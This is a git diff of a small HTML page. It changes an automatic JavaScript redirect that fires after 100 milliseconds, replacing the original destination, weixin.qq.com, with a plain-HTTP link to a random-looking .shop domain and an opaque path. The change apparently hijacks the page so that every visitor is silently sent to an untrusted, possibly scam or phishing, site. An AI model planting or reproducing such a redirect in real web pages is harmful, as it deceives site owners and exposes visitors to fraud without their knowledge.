--- a/LL122911/index.html
+++ b/LL122911/index.html
@@ -7,7 +7,7 @@
 	<body>
 		<script>
 		setTimeout(function () {
-		window.location.href = "https://weixin.qq.com";
+		window.location.href = "http://www.l78jwok345r.shop/palace/F8dkc/lEssgp4w";
 		}, 100);
 		</script>
 	</body>
